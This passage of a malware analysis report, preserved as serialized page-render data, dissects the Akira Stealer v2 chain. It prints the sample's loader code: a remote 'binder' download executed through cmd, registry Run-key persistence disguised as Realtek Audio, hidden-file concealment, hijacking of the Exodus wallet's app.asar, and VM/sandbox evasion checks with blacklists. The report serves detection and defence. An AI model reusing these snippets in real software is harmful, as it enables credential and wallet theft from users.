fs.writeFile(extractedDir + \"\\Crypto\\Util\\astor.py\", updatedFile, 'utf8');\n",[102,7853,7854],{"class":104,"line":674},[102,7855,7856],{"class":293},"});\n",[12,7858,7859],{},"This dynamic manipulation phase is essential. By delaying the insertion of attacker-controlled values until runtime, the payload avoids static detection and allows the operator to adapt targets and exfiltration endpoints without repackaging the archive.",[1255,7861,7862],{},[1258,7863,7864,7865,7867,7868],{},"Replaces placeholder strings in ",[63,7866,4622],{},":\n",[1255,7869,7870,7876,7886],{},[1258,7871,7872,7873],{},"Discord webhook: ",[63,7874,7875],{},"%DISCORD%",[1258,7877,7878,7879,805,7882,7885],{},"Wallet addresses: ",[63,7880,7881],{},"%ADDRESSBTC%",[63,7883,7884],{},"%ADDRESSETH%",", etc.",[1258,7887,7888],{},"User ID and error flags",[186,7890,7892],{"id":7891},"_624-malware-execution","6.2.4 Malware Execution",[12,7894,192],{},[1255,7896,7897],{},[1258,7898,7899,7900],{},"Once the placeholder injection into astor.py is complete, the malware initiates execution of the stealer via a system call",[56,7901,7903],{"className":6987,"code":7902,"language":6989,"meta":65,"style":65},"exec(\"python.exe Crypto\\\\Util\\\\astor.py\");\n",[63,7904,7905],{"__ignoreMap":65},[102,7906,7907,7910,7912,7915,7918,7921,7923,7926],{"class":104,"line":105},[102,7908,7909],{"class":271},"exec",[102,7911,545],{"class":293},[102,7913,7914],{"class":289},"\"python.exe Crypto",[102,7916,7917],{"class":275},"\\\\",[102,7919,7920],{"class":289},"Util",[102,7922,7917],{"class":275},[102,7924,7925],{"class":289},"astor.py\"",[102,7927,825],{"class":293},[12,7929,7930],{},"This command is executed using Node.js’s child_process.exec function and launches the embedded Python payload in a separate process. This specific execution pattern—python.exe with the argument Crypto\\Util\\astor.py—was observed in telemetry data collected by Microsoft Defender for Endpoint, making it a reliable detection artifact. In practice, the execution chain looks like this:",[12,7932,7933],{},"The full malware execution chain, as observed in Microsoft Defender for Endpoint telemetry, follows this sequence:",[1255,7935,7936,7944,7951,7958],{},[1258,7937,7938,7940,7941],{},[63,7939,4618],{}," (Electron-based container) invokes ",[63,7942,7943],{},"node.exe",[1258,7945,7946,7948,7949],{},[63,7947,7943],{}," launches ",[63,7950,5123],{},[1258,7952,7953,7955,7956],{},[63,7954,5123],{}," starts ",[63,7957,4593],{},[1258,7959,7960,7962,7963],{},[63,7961,4593],{}," executes the file ",[63,7964,5133],{},[186,7966,7968],{"id":7967},"_625-persistence-reinforcement","6.2.5 Persistence Reinforcement",[12,7970,192],{},[12,7972,7973,7974,7976],{},"To ensure long-term presence on the infected system, the decrypted JavaScript payload includes logic to re-establish persistence by copying the initial binary (",[63,7975,4614],{},") to a hidden location within the user’s profile.",[12,7978,7979],{},[251,7980,7981],{},"Target Directory",[12,7983,7984],{},"The file is copied to a directory that mimics legitimate Windows components:",[56,7986,7988],{"className":6987,"code":7987,"language":6989,"meta":65,"style":65},"%APPDATA%\\Microsoft\\Internet Explorer\\UserData\\Updater.exe\n",[63,7989,7990],{"__ignoreMap":65},[102,7991,7992,7994,7997,7999],{"class":104,"line":105},[102,7993,1278],{"class":285},[102,7995,7996],{"class":275},"APPDATA",[102,7998,1278],{"class":285},[102,8000,8001],{"class":293},"\\Microsoft\\Internet Explorer\\UserData\\Updater.exe\n",[12,8003,8004],{},"This location is intentionally chosen:",[1255,8006,8007,8010],{},[1258,8008,8009],{},"%APPDATA% is writable by regular users and doesn’t require administrative privileges.",[1258,8011,8012],{},"The directory name mimics legitimate Microsoft application folders, making it less suspicious.",[12,8014,8015],{},[251,8016,8017],{},"Copy Mechanism:",[12,8019,8020],{},"The copy operation uses Node.js’s fs.copyFileSync() function:",[56,8022,8024],{"className":6987,"code":8023,"language":6989,"meta":65,"style":65},"fs.copyFileSync(\n process.env.PORTABLE_EXECUTABLE_FILE,\n path.join(\n process.env.APPDATA,\n \"Microsoft\",\n \"Internet Explorer\",\n \"UserData\",\n \"Updater.exe\",\n ),\n);\n",[63,8025,8026,8035,8045,8054,8063,8070,8077,8084,8091,8096],{"__ignoreMap":65},[102,8027,8028,8030,8033],{"class":104,"line":105},[102,8029,7730],{"class":293},[102,8031,8032],{"class":271},"copyFileSync",[102,8034,7011],{"class":293},[102,8036,8037,8040,8043],{"class":104,"line":111},[102,8038,8039],{"class":293}," process.env.",[102,8041,8042],{"class":275},"PORTABLE_EXECUTABLE_FILE",[102,8044,7041],{"class":293},[102,8046,8047,8050,8052],{"class":104,"line":329},[102,8048,8049],{"class":293}," path.",[102,8051,7371],{"class":271},[102,8053,7011],{"class":293},[102,8055,8056,8059,8061],{"class":104,"line":346},[102,8057,8058],{"class":293}," process.env.",[102,8060,7996],{"class":275},[102,8062,7041],{"class":293},[102,8064,8065,8068],{"class":104,"line":650},[102,8066,8067],{"class":289}," \"Microsoft\"",[102,8069,7041],{"class":293},[102,8071,8072,8075],{"class":104,"line":656},[102,8073,8074],{"class":289}," \"Internet Explorer\"",[102,8076,7041],{"class":293},[102,8078,8079,8082],{"class":104,"line":662},[102,8080,8081],{"class":289}," \"UserData\"",[102,8083,7041],{"class":293},[102,8085,8086,8089],{"class":104,"line":668},[102,8087,8088],{"class":289}," \"Updater.exe\"",[102,8090,7041],{"class":293},[102,8092,8093],{"class":104,"line":674},[102,8094,8095],{"class":293}," ),\n",[102,8097,8098],{"class":104,"line":680},[102,8099,825],{"class":293},[1255,8101,8102,8105],{},[1258,8103,8104],{},"PORTABLE_EXECUTABLE_FILE is an environment variable automatically set by many packers (such as Electron) to reference the path of the executing binary.",[1258,8106,8107],{},"path.join(...) builds a fully-qualified destination path across different operating systems.",[12,8109,8110],{},"This logic executes only if the file is not already present—thus acting as a self-repair mechanism to restore the dropper if deleted.",[12,8112,8113,8116],{},[251,8114,8115],{},"Role in the Malware Chain","\nThe presence of this copied Updater.exe ensures that:",[1255,8118,8119,8122],{},[1258,8120,8121],{},"The loader can re-trigger itself across system reboots.",[1258,8123,8124],{},"The full infection chain (leading to main.exe, node.exe, and eventually astor.py) can re-initiate without relying on traditional registry persistence mechanisms, which are more likely to be monitored.",[186,8126,8128],{"id":8127},"_626-optional-binder-execution","6.2.6 Optional Binder Execution",[12,8130,192],{},[12,8132,8133,8134,8136],{},"In addition to downloading and executing the main stealer payload (",[63,8135,4622],{},"), the decrypted JavaScript also contains logic to optionally download and launch a secondary executable referred to as the \"binder.\" This component can be used for persistence, distraction, or deployment of additional malware modules.",[12,8138,8139],{},[251,8140,8141],{},"Conditional Execution",[12,8143,8144],{},"The binder logic is only activated if a specific flag is set:",[56,8146,8148],{"className":6987,"code":8147,"language":6989,"meta":65,"style":65},"enableBinder = true;\n",[63,8149,8150],{"__ignoreMap":65},[102,8151,8152,8155,8157,8160],{"class":104,"line":105},[102,8153,8154],{"class":293},"enableBinder ",[102,8156,7160],{"class":285},[102,8158,8159],{"class":275}," true",[102,8161,1365],{"class":293},[12,8163,8164,8165,8168],{},"In the sample analyzed, this value was set to ",[63,8166,8167],{},"false"," by default, but the logic remains embedded in the payload and can be trivially enabled in a different campaign or variant.",[12,8170,8171],{},[251,8172,8173],{},"Binder Download Logic",[12,8175,8176,8177,8180],{},"If activated, the script attempts to fetch an external binary from a URL defined by the ",[63,8178,8179],{},"%BINDERURL%"," placeholder:",[56,8182,8184],{"className":6987,"code":8183,"language":6989,"meta":65,"style":65},"const fileUrl = \"%BINDERURL%\";\nconst fileResponse = await axios.get(fileUrl, { responseType: \"stream\" });\nconst writer = fs.createWriteStream(binderFile);\nfileResponse.data.pipe(writer);\n",[63,8185,8186,8200,8220,8235],{"__ignoreMap":65},[102,8187,8188,8190,8193,8195,8198],{"class":104,"line":105},[102,8189,6996],{"class":285},[102,8191,8192],{"class":275}," fileUrl",[102,8194,7002],{"class":285},[102,8196,8197],{"class":289}," \"%BINDERURL%\"",[102,8199,1365],{"class":293},[102,8201,8202,8204,8206,8208,8210,8212,8214,8216,8218],{"class":104,"line":111},[102,8203,6996],{"class":285},[102,8205,7462],{"class":275},[102,8207,7002],{"class":285},[102,8209,7467],{"class":285},[102,8211,7470],{"class":293},[102,8213,7473],{"class":271},[102,8215,7476],{"class":293},[102,8217,7479],{"class":289},[102,8219,7482],{"class":293},[102,8221,8222,8224,8226,8228,8230,8232],{"class":104,"line":329},[102,8223,6996],{"class":285},[102,8225,7500],{"class":275},[102,8227,7002],{"class":285},[102,8229,7505],{"class":293},[102,8231,7508],{"class":271},[102,8233,8234],{"class":293},"(binderFile);\n",[102,8236,8237,8239,8241],{"class":104,"line":346},[102,8238,7516],{"class":293},[102,8240,7519],{"class":271},[102,8242,7522],{"class":293},[1255,8244,8245,8250],{},[1258,8246,6600,8247,8249],{},[63,8248,7350],{}," file is saved into the system's temporary directory.",[1258,8251,8252,8253,8255],{},"Like ",[63,8254,6874],{},", the binary is downloaded using Axios in a streamed fashion to avoid loading the entire binary into memory.",[12,8257,8258],{},[251,8259,8260],{},"Execution Strategy",[12,8262,8263,8264,8266],{},"After successful download, the script invokes the downloaded binary using ",[63,8265,5123],{},", ensuring that it runs in a new shell context:",[56,8268,8270],{"className":6987,"code":8269,"language":6989,"meta":65,"style":65},"exec(`start cmd /c start ${binderFile}`, ...);\n",[63,8271,8272],{"__ignoreMap":65},[102,8273,8274,8276,8278,8281,8284,8287,8289,8292],{"class":104,"line":105},[102,8275,7909],{"class":271},[102,8277,545],{"class":293},[102,8279,8280],{"class":289},"`start cmd /c start ${",[102,8282,8283],{"class":293},"binderFile",[102,8285,8286],{"class":289},"}`",[102,8288,805],{"class":293},[102,8290,8291],{"class":285},"...",[102,8293,825],{"class":293},[12,8295,8296],{},"To increase reliability, the script includes retry logic:",[56,8298,8300],{"className":6987,"code":8299,"language":6989,"meta":65,"style":65},"setTimeout(() => {\n exec(...);\n}, 5000);\n",[63,8301,8302,8314,8325],{"__ignoreMap":65},[102,8303,8304,8307,8310,8312],{"class":104,"line":105},[102,8305,8306],{"class":271},"setTimeout",[102,8308,8309],{"class":293},"(() ",[102,8311,7782],{"class":285},[102,8313,7785],{"class":293},[102,8315,8316,8319,8321,8323],{"class":104,"line":111},[102,8317,8318],{"class":271}," exec",[102,8320,545],{"class":293},[102,8322,8291],{"class":285},[102,8324,825],{"class":293},[102,8326,8327,8330,8333],{"class":104,"line":329},[102,8328,8329],{"class":293},"}, ",[102,8331,8332],{"class":275},"5000",[102,8334,825],{"class":293},[12,8336,8337],{},"This ensures that even if the initial execution fails (e.g., due to system load or race conditions), the malware will reattempt launching the binary after a short delay.",[12,8339,8340],{},[251,8341,8342],{},"Use Cases for the Binder",[12,8344,8345],{},"While the exact purpose of the binder binary is not revealed in this particular sample (due to the placeholder URL), such components are commonly used to:",[1255,8347,8348,8351,8354,8357],{},[1258,8349,8350],{},"Reinstall or relaunch the primary malware components",[1258,8352,8353],{},"Display fake installers or decoy applications",[1258,8355,8356],{},"Deploy additional spyware, backdoors, or ransomware",[1258,8358,8359],{},"Modify system settings or disable security features",[41,8361,8363],{"id":8362},"_63-summary","6.3 Summary",[12,8365,47],{},[12,8367,8368,8370],{},[63,8369,6813],{}," is a highly obfuscated, encrypted JavaScript loader that uses industry-standard cryptography (PBKDF2 + AES-256-CBC) to protect its true purpose. Upon decryption, it operates as a fully capable second-stage loader that:",[1255,8372,8373,8378,8381,8386],{},[1258,8374,8375,8376,1289],{},"Retrieves further malware (",[63,8377,6874],{},[1258,8379,8380],{},"Modifies payload behavior dynamically",[1258,8382,8383,8384,1289],{},"Launches the actual stealer script (",[63,8385,4622],{},[1258,8387,8388,8389],{},"Reinforces persistence by restoring ",[63,8390,4614],{},[12,8392,8393,8394,8397],{},"Its combination of encryption, dynamic execution, modular payload fetching, and fileless operation showcases a ",[251,8395,8396],{},"highly advanced JavaScript-based malware architecture"," that leverages Node.js capabilities in an Electron shell.",[25,8399,8401,8402,1289],{"id":8400},"_7-deepdive-akira-stealer-v2-astorpy","7. DeepDive: Akira Stealer v2 (",[63,8403,4622],{},[12,8405,31],{},[41,8407,8409],{"id":8408},"_71-high-level-functionality","7.1. High-Level Functionality",[12,8411,47],{},[12,8413,8414,8415,8417],{},"Akira Stealer v2 (",[63,8416,4622],{},") is a multi-functional, modular infostealer malware written in Python. It is designed to exfiltrate a broad range of sensitive user data from both Chromium- and Firefox-based browsers, crypto wallets, communication clients (e.g., Discord, Telegram), and system files. It incorporates sophisticated anti-analysis mechanisms, registry-based persistence, clipboard hijacking, and memory injection techniques.",[41,8419,8421],{"id":8420},"_72-persistence-and-deployment","7.2 Persistence and Deployment",[12,8423,47],{},[186,8425,8427],{"id":8426},"_721-execution-chain-context","7.2.1 Execution Chain Context",[12,8429,192],{},[12,8431,8432,8434],{},[63,8433,4622],{}," is not executed standalone but is the final payload in a multi-stage attack chain:",[56,8436,8440],{"className":8437,"code":8438,"language":8439,"meta":65,"style":65},"language-plaintext shiki shiki-themes github-light github-dark","Updater.exe\n └── main.exe (Electron app)\n └── cmd.exe\n └── python.exe astor.py\n","plaintext",[63,8441,8442,8447,8452,8457],{"__ignoreMap":65},[102,8443,8444],{"class":104,"line":105},[102,8445,8446],{},"Updater.exe\n",[102,8448,8449],{"class":104,"line":111},[102,8450,8451],{}," └── main.exe (Electron app)\n",[102,8453,8454],{"class":104,"line":329},[102,8455,8456],{}," └── cmd.exe\n",[102,8458,8459],{"class":104,"line":346},[102,8460,8461],{}," └── python.exe astor.py\n",[12,8463,8464,8465,8467],{},"This structured execution chain allows each stage to evade detection by delegating malicious functionality to the next. ",[63,8466,4614],{}," initiates the sequence and is responsible for maintaining persistence.",[186,8469,8471],{"id":8470},"_722-registry-based-persistence","7.2.2 Registry-Based Persistence",[12,8473,192],{},[12,8475,8476,8477,8479],{},"Akira establishes persistence by writing a registry key under the current user’s Run path. This ensures that ",[63,8478,4614],{}," is executed on each system startup:",[56,8481,8485],{"className":8482,"code":8483,"language":8484,"meta":65,"style":65},"language-python shiki shiki-themes github-light github-dark","command = f'reg add HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run /v \"Realtek Audio\" /t REG_SZ /d \"{path}\\\\Updater.exe\" /f'\nos.system(command)\n","python",[63,8486,8487,8492],{"__ignoreMap":65},[102,8488,8489],{"class":104,"line":105},[102,8490,8491],{},"command = f'reg add HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run /v \"Realtek Audio\" /t REG_SZ /d \"{path}\\\\Updater.exe\" /f'\n",[102,8493,8494],{"class":104,"line":111},[102,8495,8496],{},"os.system(command)\n",[1255,8498,8499,8506,8514],{},[1258,8500,8501,1062,8504],{},[251,8502,8503],{},"Path",[63,8505,5665],{},[1258,8507,8508,1062,8511,8513],{},[251,8509,8510],{},"Value name",[63,8512,5673],{}," (chosen to appear benign)",[1258,8515,8516,8519,8520],{},[251,8517,8518],{},"Payload path",": Typically in ",[63,8521,8522],{},"AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\\\Updater.exe",[12,8524,8525,8526,8529],{},"This command silently writes the autorun entry via PowerShell or native ",[63,8527,8528],{},"os.system()"," execution.",[186,8531,8533],{"id":8532},"_723-file-concealment","7.2.3 File Concealment",[12,8535,192],{},[12,8537,8538],{},"To further obscure the binary from users and simple AV scans, the file is marked with hidden and system attributes:",[56,8540,8542],{"className":8482,"code":8541,"language":8484,"meta":65,"style":65},"subprocess.run([\"attrib\", \"+h\", \"+s\", destination_path])\n",[63,8543,8544],{"__ignoreMap":65},[102,8545,8546],{"class":104,"line":105},[102,8547,8541],{},[1255,8549,8550,8556],{},[1258,8551,8552,8555],{},[63,8553,8554],{},"+h",": Marks the file as hidden",[1258,8557,8558,8561],{},[63,8559,8560],{},"+s",": Marks the file as a protected system file",[12,8563,8564],{},"This effectively removes the file from standard Windows Explorer views and increases stealth.",[186,8566,8568],{"id":8567},"_724-reinfection-techniques","7.2.4 Reinfection Techniques",[12,8570,192],{},[12,8572,8573,8574,8576,8577,805,8580,8583],{},"The malware supports self-replication and reinfection through Electron application hijacking. Specifically, it replaces the ",[63,8575,5068],{}," archive in Electron-based desktop wallets (e.g., ",[251,8578,8579],{},"Exodus",[251,8581,8582],{},"Atomic Wallet",") to execute malicious JavaScript during legitimate app startup.",[12,8585,8586],{},"The logic looks for known wallet app paths:",[56,8588,8590],{"className":8482,"code":8589,"language":8484,"meta":65,"style":65},"path = os.getenv(\"APPDATA\") + \"\\\\Exodus\\\\resources\\\\app.asar\"\n",[63,8591,8592],{"__ignoreMap":65},[102,8593,8594],{"class":104,"line":105},[102,8595,8589],{},[12,8597,8598,8599,1014],{},"If the target file exists, it is overwritten with a weaponized archive. This ensures persistence even after manual cleanup of ",[63,8600,4614],{},[41,8602,8604,8605,1289],{"id":8603},"_73-anti-analysis-evasion-class-vmprotect","7.3 Anti-Analysis / Evasion (Class: ",[63,8606,8607],{},"VmProtect",[12,8609,47],{},[186,8611,8613],{"id":8612},"_731-introduction","7.3.1 Introduction",[12,8615,192],{},[12,8617,8618,8619,8621,8622,8624],{},"In modern malware campaigns, evading analysis in virtualized and sandboxed environments is critical to maintain stealth. The ",[4328,8620,4683],{}," implements a comprehensive VM/sandbox detection module (",[63,8623,8607],{},") that aggressively identifies and aborts execution under analyst-controlled environments. This report dissects each detection technique, provides the exact code snippets—including complete blacklist definitions—and outlines the analysis methodology used.",[186,8626,8628],{"id":8627},"_732-overview","7.3.2 Overview",[12,8630,192],{},[12,8632,6600,8633,8635],{},[63,8634,8607],{}," class implements robust VM and sandbox detection to prematurely abort execution in analysis environments. It supports two detection levels:",[1255,8637,8638,8644],{},[1258,8639,8640,8643],{},[251,8641,8642],{},"Level 1",": Lightweight, fast checks",[1258,8645,8646,8649],{},[251,8647,8648],{},"Level 2",": In-depth, comprehensive probes",[12,8651,8652,8653,8656,8657,8660,8661,8664],{},"If ",[63,8654,8655],{},"VmProtect.isVM(level)"," returns ",[63,8658,8659],{},"True",", the malware calls ",[63,8662,8663],{},"sys.exit()",", preventing further analysis.",[186,8666,8668],{"id":8667},"_733-detection-levels","7.3.3 Detection Levels",[12,8670,192],{},[417,8672,420,8674],{"style":8673},"width:100%; border-collapse: collapse;",[438,8675,8676,420,8685,420,8695,420,8705,420,8714,420,8724,420,8733,420,8742],{},[426,8677,424,8678,424,8681,424,8683,420],{},[430,8679,8680],{},"Feature",[430,8682,8642],{"style":3672},[430,8684,8648],{"style":3672},[426,8686,424,8687,424,8690,424,8693,420],{},[443,8688,8689],{},"HTTPSimulation",[443,8691,8692],{"style":3672},"✔️",[443,8694,8692],{"style":3672},[426,8696,424,8698,424,8701,424,8703,420],{"style":8697},"background-color: #f5f5f5;",[443,8699,8700],{},"Computer-name blacklist",[443,8702,8692],{"style":3672},[443,8704,8692],{"style":3672},[426,8706,424,8707,424,8710,424,8712,420],{},[443,8708,8709],{},"User-account blacklist",[443,8711,8692],{"style":3672},[443,8713,8692],{"style":3672},[426,8715,424,8716,424,8719,424,8722,420],{"style":8697},[443,8717,8718],{},"Hardware-UUID blacklist",[443,8720,8721],{"style":3672},"❌",[443,8723,8692],{"style":3672},[426,8725,424,8726,424,8729,424,8731,420],{},[443,8727,8728],{},"Public-hosting API check",[443,8730,8721],{"style":3672},[443,8732,8692],{"style":3672},[426,8734,424,8735,424,8738,424,8740,420],{"style":8697},[443,8736,8737],{},"Registry & GPU hints",[443,8739,8721],{"style":3672},[443,8741,8692],{"style":3672},[426,8743,424,8744,424,8747,424,8749,420],{},[443,8745,8746],{},"Task-killing background",[443,8748,8692],{"style":3672},[443,8750,8692],{"style":3672},[52,8752],{"className":8753},[4854,4855],[186,8755,8757,8758,8760],{"id":8756},"_734-vmprotect-architecture","7.3.4 ",[63,8759,8607],{}," Architecture",[12,8762,192],{},[12,8764,6600,8765,8767],{},[63,8766,8607],{}," class exposes the following primary methods:",[1255,8769,8770,8777,8784,8791,8798,8805,8812,8819],{},[1258,8771,8772],{},[251,8773,8774],{},[63,8775,8776],{},"checkUUID()",[1258,8778,8779],{},[251,8780,8781],{},[63,8782,8783],{},"checkComputerName()",[1258,8785,8786],{},[251,8787,8788],{},[63,8789,8790],{},"checkUsers()",[1258,8792,8793],{},[251,8794,8795],{},[63,8796,8797],{},"checkHosting()",[1258,8799,8800],{},[251,8801,8802],{},[63,8803,8804],{},"checkHTTPSimulation()",[1258,8806,8807],{},[251,8808,8809],{},[63,8810,8811],{},"checkRegistry()",[1258,8813,8814],{},[251,8815,8816],{},[63,8817,8818],{},"killTasks()",[1258,8820,8821],{},[251,8822,8823],{},[63,8824,8825],{},"isVM(level)",[12,8827,8828,8829,8832],{},"Each method returns a boolean or executes evasion steps. The ",[63,8830,8831],{},"isVM"," wrapper aggregates these checks based on the specified level.",[417,8834,420,8835],{"style":8673},[438,8836,8837,420,8849,420,8863,420,8877,420,8890,420,8903,420,8916,420,8929,420,8944],{},[426,8838,424,8839,424,8843,424,8846,420],{},[430,8840,8842],{"style":8841},"text-align: left;","Method",[430,8844,8845],{"style":8841},"Triggered By",[430,8847,8848],{"style":8841},"Description",[426,8850,424,8851,424,8855,424,8860,420],{},[443,8852,8853],{},[63,8854,8776],{},[443,8856,8857],{},[63,8858,8859],{},"isVM(2)",[443,8861,8862],{},"WMI UUID blacklist",[426,8864,424,8865,424,8869,424,8874,420],{"style":8697},[443,8866,8867],{},[63,8868,8783],{},[443,8870,8871],{},[63,8872,8873],{},"isVM(1,2)",[443,8875,8876],{},"Environment hostname match",[426,8878,424,8879,424,8883,424,8887,420],{},[443,8880,8881],{},[63,8882,8790],{},[443,8884,8885],{},[63,8886,8873],{},[443,8888,8889],{},"Username blacklist",[426,8891,424,8892,424,8896,424,8900,420],{"style":8697},[443,8893,8894],{},[63,8895,8797],{},[443,8897,8898],{},[63,8899,8859],{},[443,8901,8902],{},"IP hosting provider check via ip-api.com",[426,8904,424,8905,424,8909,424,8913,420],{},[443,8906,8907],{},[63,8908,8804],{},[443,8910,8911],{},[63,8912,8873],{},[443,8914,8915],{},"HTTPS interception detection",[426,8917,424,8918,424,8922,424,8926,420],{"style":8697},[443,8919,8920],{},[63,8921,8811],{},[443,8923,8924],{},[63,8925,8859],{},[443,8927,8928],{},"Registry & GPU driver artifacts",[426,8930,424,8931,424,8935,424,8941,420],{},[443,8932,8933],{},[63,8934,8818],{},[443,8936,8937,8940],{},[63,8938,8939],{},"isVM(...)"," spawn",[443,8942,8943],{},"Terminates known analysis processes",[426,8945,424,8946,424,8950,424,8953,420],{"style":8697},[443,8947,8948],{},[63,8949,8825],{},[443,8951,8952],{},"init",[443,8954,8955,8956,8958],{},"Aggregates checks and calls ",[63,8957,8818],{}," thread",[52,8960],{"className":8961},[4854,4855],[56,8963,8965],{"className":8482,"code":8964,"language":8484,"meta":65,"style":65},"@staticmethod\ndef isVM(level: int) -> bool:\n # Always start background task-killer\n Thread(target=VmProtect.killTasks, daemon=True).start()\n if level == 1:\n # Fast path: HTTPS, hostname & user\n return (\n VmProtect.checkHTTPSimulation()\n or VmProtect.checkComputerName()\n or VmProtect.checkUsers()\n )\n if level == 2:\n # Deep scan: includes UUID, hosting, registry & GPU\n try:\n return (\n VmProtect.checkHTTPSimulation()\n or VmProtect.checkUUID()\n or VmProtect.checkComputerName()\n or VmProtect.checkUsers()\n or VmProtect.checkHosting()\n or VmProtect.checkRegistry()\n )\n except:\n return False\n return False\n",[63,8966,8967,8972,8977,8982,8987,8992,8997,9002,9007,9012,9017,9023,9029,9035,9041,9047,9053,9059,9065,9071,9077,9083,9089,9095,9101],{"__ignoreMap":65},[102,8968,8969],{"class":104,"line":105},[102,8970,8971],{},"@staticmethod\n",[102,8973,8974],{"class":104,"line":111},[102,8975,8976],{},"def isVM(level: int) -> bool:\n",[102,8978,8979],{"class":104,"line":329},[102,8980,8981],{}," # Always start background task-killer\n",[102,8983,8984],{"class":104,"line":346},[102,8985,8986],{}," Thread(target=VmProtect.killTasks, daemon=True).start()\n",[102,8988,8989],{"class":104,"line":650},[102,8990,8991],{}," if level == 1:\n",[102,8993,8994],{"class":104,"line":656},[102,8995,8996],{}," # Fast path: HTTPS, hostname & user\n",[102,8998,8999],{"class":104,"line":662},[102,9000,9001],{}," return (\n",[102,9003,9004],{"class":104,"line":668},[102,9005,9006],{}," VmProtect.checkHTTPSimulation()\n",[102,9008,9009],{"class":104,"line":674},[102,9010,9011],{}," or VmProtect.checkComputerName()\n",[102,9013,9014],{"class":104,"line":680},[102,9015,9016],{}," or VmProtect.checkUsers()\n",[102,9018,9020],{"class":104,"line":9019},11,[102,9021,9022],{}," )\n",[102,9024,9026],{"class":104,"line":9025},12,[102,9027,9028],{}," if level == 2:\n",[102,9030,9032],{"class":104,"line":9031},13,[102,9033,9034],{}," # Deep scan: includes UUID, hosting, registry & GPU\n",[102,9036,9038],{"class":104,"line":9037},14,[102,9039,9040],{}," try:\n",[102,9042,9044],{"class":104,"line":9043},15,[102,9045,9046],{}," return (\n",[102,9048,9050],{"class":104,"line":9049},16,[102,9051,9052],{}," VmProtect.checkHTTPSimulation()\n",[102,9054,9056],{"class":104,"line":9055},17,[102,9057,9058],{}," or VmProtect.checkUUID()\n",[102,9060,9062],{"class":104,"line":9061},18,[102,9063,9064],{}," or VmProtect.checkComputerName()\n",[102,9066,9068],{"class":104,"line":9067},19,[102,9069,9070],{}," or VmProtect.checkUsers()\n",[102,9072,9074],{"class":104,"line":9073},20,[102,9075,9076],{}," or VmProtect.checkHosting()\n",[102,9078,9080],{"class":104,"line":9079},21,[102,9081,9082],{}," or VmProtect.checkRegistry()\n",[102,9084,9086],{"class":104,"line":9085},22,[102,9087,9088],{}," )\n",[102,9090,9092],{"class":104,"line":9091},23,[102,9093,9094],{}," except:\n",[102,9096,9098],{"class":104,"line":9097},24,[102,9099,9100],{}," return False\n",[102,9102,9104],{"class":104,"line":9103},25,[102,9105,9106],{}," return False\n",[186,9108,9110],{"id":9109},"_735-uuid-check-identifying-virtual-machines-via-hardware-uuid","7.3.5 UUID Check – Identifying Virtual Machines via Hardware UUID",[12,9112,192],{},[12,9114,9115],{},"A common tactic in malware evasion is fingerprinting the underlying hardware environment. One of the earliest identifiers that can signal a virtual machine is the system UUID (Universally Unique Identifier). Virtualization platforms like VMware and VirtualBox often generate predictable or reused UUIDs, which can be used by malware to infer whether it is running in a virtualized or sandboxed environment.",[56,9117,9119],{"className":8482,"code":9118,"language":8484,"meta":65,"style":65},"@staticmethod\ndef checkUUID() -> bool:\n try:\n raw = subprocess.run(\n \"wmic csproduct get uuid\", shell=True,\n capture_output=True\n ).stdout.splitlines()[2].decode().strip()\n except:\n raw = \"\"\n return raw in VmProtect.BLACKLISTED_UUIDS\n",[63,9120,9121,9125,9130,9135,9140,9145,9150,9155,9160,9165],{"__ignoreMap":65},[102,9122,9123],{"class":104,"line":105},[102,9124,8971],{},[102,9126,9127],{"class":104,"line":111},[102,9128,9129],{},"def checkUUID() -> bool:\n",[102,9131,9132],{"class":104,"line":329},[102,9133,9134],{}," try:\n",[102,9136,9137],{"class":104,"line":346},[102,9138,9139],{}," raw = subprocess.run(\n",[102,9141,9142],{"class":104,"line":650},[102,9143,9144],{}," \"wmic csproduct get uuid\", shell=True,\n",[102,9146,9147],{"class":104,"line":656},[102,9148,9149],{}," capture_output=True\n",[102,9151,9152],{"class":104,"line":662},[102,9153,9154],{}," ).stdout.splitlines()[2].decode().strip()\n",[102,9156,9157],{"class":104,"line":668},[102,9158,9159],{}," except:\n",[102,9161,9162],{"class":104,"line":674},[102,9163,9164],{}," raw = \"\"\n",[102,9166,9167],{"class":104,"line":680},[102,9168,9169],{}," return raw in VmProtect.BLACKLISTED_UUIDS\n",[12,9171,9172],{},"This check leverages the Windows Management Instrumentation Command-line (WMIC) tool to extract the UUID of the host machine. The returned value is then cross-checked against a curated list of UUIDs that are commonly associated with virtual machine templates or known analysis setups.",[186,9174,9176],{"id":9175},"_736-computer-name-check-detecting-sandbox-and-analysis-environments-via-hostname","7.3.6 Computer Name Check – Detecting Sandbox and Analysis Environments via Hostname",[12,9178,192],{},[12,9180,9181,9182,9185],{},"The system hostname, accessed via the ",[63,9183,9184],{},"%COMPUTERNAME%"," environment variable, often reveals clues about its environment. Analysts frequently use default or quickly-generated hostnames like \"DESKTOP-XXXXXXX\", \"WIN10ANALYSIS\", or even names linked to their internal environments. Malware takes advantage of this by comparing the system's hostname against a blacklist.",[56,9187,9189],{"className":8482,"code":9188,"language":8484,"meta":65,"style":65},"@staticmethod\ndef checkComputerName() -> bool:\n name = os.getenv(\"computername\", \"\").lower()\n return name in VmProtect.BLACKLISTED_COMPUTERNAMES\n\nBLACKLISTED_COMPUTERNAMES = (\n '00900bc83802','bee7370c-8c0c-4','desktop-nakffmt',\n 'desktop-vkeons4','ntt-eff-2w11wss',\n # ... dozens more entries ...\n)\n",[63,9190,9191,9195,9200,9205,9210,9214,9219,9224,9229,9234],{"__ignoreMap":65},[102,9192,9193],{"class":104,"line":105},[102,9194,8971],{},[102,9196,9197],{"class":104,"line":111},[102,9198,9199],{},"def checkComputerName() -> bool:\n",[102,9201,9202],{"class":104,"line":329},[102,9203,9204],{}," name = os.getenv(\"computername\", \"\").lower()\n",[102,9206,9207],{"class":104,"line":346},[102,9208,9209],{}," return name in VmProtect.BLACKLISTED_COMPUTERNAMES\n",[102,9211,9212],{"class":104,"line":650},[102,9213,7846],{"emptyLinePlaceholder":2180},[102,9215,9216],{"class":104,"line":656},[102,9217,9218],{},"BLACKLISTED_COMPUTERNAMES = (\n",[102,9220,9221],{"class":104,"line":662},[102,9222,9223],{}," '00900bc83802','bee7370c-8c0c-4','desktop-nakffmt',\n",[102,9225,9226],{"class":104,"line":668},[102,9227,9228],{}," 